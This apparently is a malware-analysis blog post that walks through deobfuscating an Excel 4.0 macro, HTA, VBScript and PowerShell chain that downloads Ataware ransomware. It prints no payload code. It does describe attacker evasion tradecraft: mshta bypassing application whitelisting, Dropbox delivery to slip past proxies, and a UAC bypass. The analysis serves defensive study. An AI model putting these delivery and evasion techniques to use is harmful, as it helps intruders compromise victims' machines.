Excel 4.0 Macro, hta, VBScript & PowerShell Analysis Ataware Ransomware – Part 0x1

This will be a multiple part blog series analysing the complete infection chain from Excel to Ataware Ransomware. In this post we will discuss analysis steps for hta, VBScript & PowerShell code to extract the final payload url. Let’s start with xls, I was browsing Twitter for an interesting sample, then I found this tweet from @nao_sec and started investigating. You can download the xls from ANY.RUN.

nao_sec Tweet
nao_sec Tweet

Overview of analysis steps

Ataware Infection Vector
Overview of analysis steps

xls analysis steps

  1. Check the file type and extract the string
    strings "563902-IT Services Procurement Catalog updated.xls" > str_excel.txt
    file and strings on xls
    file and strings on xls
  2. Go through the strings output and you will find the mshta cmd with Dropbox url
    mshta string
    Output from string cmd
  3. Now you know, this excel is definitely malicious by using only string tool
  4. Let’s analyse it further to understand how this mshta is invoked
  5. Run olevba on xls, as you can see in the output below it uses Excel 4.0 macro hidden sheet to execute mshta cmd.
    Olevba tool
    Detecting Excel 4.0 Macro

For more details on Excel 4.0 Macro, check the references section[1]. Now we will move on the hta file analysis.

htseelaaa.hta analysis

Content of hta file
Why are attacker using hta?

HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser [2]. hta file can be executed using inbuilt trusted Windows utility mshta which can bypass Application Whitelisting.

Deobfuscate Steps
  1. Extract the vbs code from hta file and save as vbs
  2. Replace the eval with Wscript.Echo and execute using cscript
    Execute cscript
    Replace Eval with Wscript.Echo and run using cscript
  3. Now you can see the base64 encoded PowerShell code, instead of manual deobfuscation let’s run the PowerShell code inside our VM with FakeNet-NG
    Execute PowerShell
    Execute PowerShell code extracted from VBScript
  4. Enable PowerShell Enhanced Logging before running above PowerShell code, for more details check this Deobfuscate PowerShell using PowerShell Logging
  5. After executing, go through PowerShell logs in EventViewer to find out the debofuscate code as shown below
    Decoded PowerShell
    Decoded PowerShell in PowerShell Logs
  6. Copy the PowerShell code after removing iex and execute it to see the final decoded code shown below
    Final Decoded PS
  7. This PowerShell download the PE file from the dropbox link and executes it in the $temp directory with filename ATAPIinit.exe.

Conclusion

  • Infection vector is unique as it is using Excel 4.0 Macro technique with mshta and PowerShell.
  • Heavily obfuscated to slow down analysis
  • Using dropbox as initial payload delivery, as dropbox may be allowed in proxy

Upcoming part 0x2 we will analyse the UAC bypass using CMSTPLUA COM interface technique used by PE file downloaded from PowerShell.

Hope you enjoyed this post, please  me on Twitter to get the latest update about my malware analysis & DFIR journey. Happy Reversing 😊

Related Posts

2 Comments. Leave new

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.

Menu